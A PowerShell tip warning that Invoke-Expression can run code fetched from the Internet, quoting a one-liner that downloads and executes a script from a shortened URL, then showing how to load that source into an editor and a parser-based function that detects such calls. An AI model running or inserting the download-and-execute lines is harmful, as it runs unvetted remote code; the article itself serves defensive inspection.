Smuggling In PowerShell Code

by Aug 24, 2016

PowerShell 2

There is a good reason why Invoke-Expression is considered risky. This cmdlet executes whatever string it gets, and attackers can download malicious code from the Internet, bypass script analysis, and execute it. Here is a benign example of what a simple one-liner can turn into, written by Lee Holmes from the PowerShell team:

Invoke-Expression (New-Object Net.WebClient).DownloadString('http://bit.ly/e0Mw9w')

If you don’t trust this code, you might want to remove Invoke-Expression and view the source code that is downloaded from the web. If you are working with the PowerShell ISE, you can use this code to download the source code directly into an editor tab:

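# Open a new, empty editor tab ($psise exists only inside the PowerShell ISE)
$file = $psise.CurrentPowerShellTab.Files.Add()
# Download the script as plain text into the tab; nothing is executed
$file.Editor.Text = (New-Object Net.WebClient).DownloadString('http://bit.ly/e0Mw9w')
# Move the caret to the top of the downloaded text
$file.Editor.SetCaretPosition(1,1)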
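
Once the source is available as text, it can also be checked for this pattern without running it. The following is an added example, not part of the original tip or Lee Holmes' code: it parses script text and lists every Invoke-Expression (or iex) call and every DownloadString call. It assumes PowerShell 3.0 or later for the parser API; the function name Find-RiskyInvocation and the sample script with its placeholder URL are constructed for illustration.

```powershell
# Added example: statically inspect script text without executing any of it.
# Assumption: PowerShell 3.0+ (System.Management.Automation.Language.Parser).
function Find-RiskyInvocation {
    param([Parameter(Mandatory = $true)][string] $ScriptText)

    $tokens = $null
    $errors = $null
    # ParseInput only builds the syntax tree; nothing in $ScriptText runs.
    $ast = [System.Management.Automation.Language.Parser]::ParseInput(
        $ScriptText, [ref] $tokens, [ref] $errors)

    # Match commands that evaluate a string as code (cmdlet name and its
    # built-in alias) and any .DownloadString(...) method call.
    $hits = $ast.FindAll({
        param($node)
        ($node -is [System.Management.Automation.Language.CommandAst] -and
            'Invoke-Expression', 'iex' -contains $node.GetCommandName()) -or
        ($node -is [System.Management.Automation.Language.InvokeMemberExpressionAst] -and
            $node.Member -is [System.Management.Automation.Language.StringConstantExpressionAst] -and
            $node.Member.Value -eq 'DownloadString')
    }, $true)   # $true: also search nested script blocks

    foreach ($hit in $hits) {
        [pscustomobject]@{
            Line = $hit.Extent.StartLineNumber
            Kind = $hit.GetType().Name
            Text = $hit.Extent.Text
        }
    }
}

# Constructed sample input; the URL is a placeholder and is never contacted.
$sample = @'
$url = 'http://example.invalid/script.ps1'
Invoke-Expression (New-Object Net.WebClient).DownloadString($url)
$code = (New-Object Net.WebClient).DownloadString($url)
iex $code
'@

Find-RiskyInvocation -ScriptText $sample | Format-Table -AutoSize
```

Name matching like this is a triage aid: a script that builds the command name dynamically will not match, so a clean result does not replace reading the downloaded source.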
